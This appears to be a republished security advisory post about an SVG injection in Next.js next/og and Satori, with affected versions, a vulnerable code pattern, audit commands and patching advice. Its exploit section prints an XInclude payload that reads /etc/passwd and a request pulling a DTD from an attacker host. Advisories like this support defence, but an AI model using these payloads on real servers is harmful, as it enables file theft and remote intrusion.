Listen to this Post
The Node.js ImageResponse implementation from next/og is affected by an upstream vulnerability in the Satori library (CWE-116: Improper Encoding or Escaping of Output). Satori, which converts JSX/HTML-like structures into SVG before rasterization, fails to properly escape attacker-controlled values placed into SVG content, attributes, or styles. This allows crafted input to be interpreted as SVG markup rather than harmless text.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation. A typical vulnerable pattern is:
import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
const value = new URL(request.url).searchParams.get('value') ?? ''
return new ImageResponse(
<svg width="1200" height="630">
<>{value}</>
</svg>
)
}
When the application runs on the Node.js runtime with `sharp` installed, the generated SVG is rasterized by native libraries (libvips, librsvg, libxml2) rather than the sandboxed wasm renderer. A payload built from an XInclude reference and nested DTD entities corrupts memory inside the native parser. Since the official Node.js binary is non-PIE, its code and GOT are not randomized, allowing a fixed ROP chain to reach `execve` without an address leak. One unauthenticated request to an OG-image route is sufficient to run commands as the server process.
Applications using the Edge ImageResponse implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected. The vulnerability affects Next.js versions 16.2.0 through 16.3.5 and Satori versions >=0.0.27 <0.33.5. Patched releases are Next.js 16.3.6 and Satori 0.33.5.
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js ImageResponse implementation from next/og. Escape untrusted input as XML before rendering, or keep it out of the generated image entirely.
DailyCVE Form:
Platform: Next.js
Version: 16.2.0–16.3.5
Vulnerability: SVG Injection
Severity: Critical
date: September 22, 2026
Prediction: October 2026
What Undercode Say
Analytics
curl -s "http://target/api/og?value=hello" -o /dev/null -w "%{http_code}\n"
// Vulnerable route pattern to search for in codebase grep -r "from 'next/og'" --include=".ts" --include=".tsx" . grep -r "ImageResponse" --include=".ts" --include=".tsx" .
Check runtime and sharp installation grep -r "runtime" --include=".ts" --include=".tsx" app/ | grep -i "edge|nodejs" npm list sharp
How Exploit: (Educational Purposes!)
docker build -t cve-2026-94545 .
docker run -d --name cve-2026-94545 -p 3000:3000 cve-2026-94545
curl -s -o /dev/null -w "%{http_code}\n" "http://127.0.0.1:3000/api/og?value=hello"
<!-- XInclude payload embedded in SVG --> <><xi:include href="file:///etc/passwd" parse="text" xmlns:xi="http://www.w3.org/2001/XInclude"/></>
import requests
payload = '<xi:include href="http://attacker.com/evil.dtd" parse="text" xmlns:xi="http://www.w3.org/2001/XInclude"/>'
requests.get(f"http://target/api/og?value={payload}")
Protection: from this CVE
- Upgrade Next.js to 16.3.6 or later
- Upgrade Satori to 0.33.5 or later (if used directly)
- Never pass untrusted input into SVG content, attributes, or styles
- Escape all dynamic values as XML before rendering
- Use Edge runtime (
export const runtime = 'edge') to avoid the native rasterizer path - Remove `sharp` if not strictly required
- Audit all `ImageResponse` imports from `next/og` for untrusted data flow
Impact
- Unauthenticated remote code execution as the Next.js server process
- Any route that passes request data into `ImageResponse` is a potential sink
- The exploit is blind — a successful `execve` replaces the worker, requiring reverse shell or out-of-band exfiltration
- The payload is stable due to non-PIE Node binary, no address leak required
- A successful hit crashes the worker process, causing denial of service until restart
- CVSS v4.0 Base Score: 9.5 (Critical)
- CVSS v3 Base Score: 10.0
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

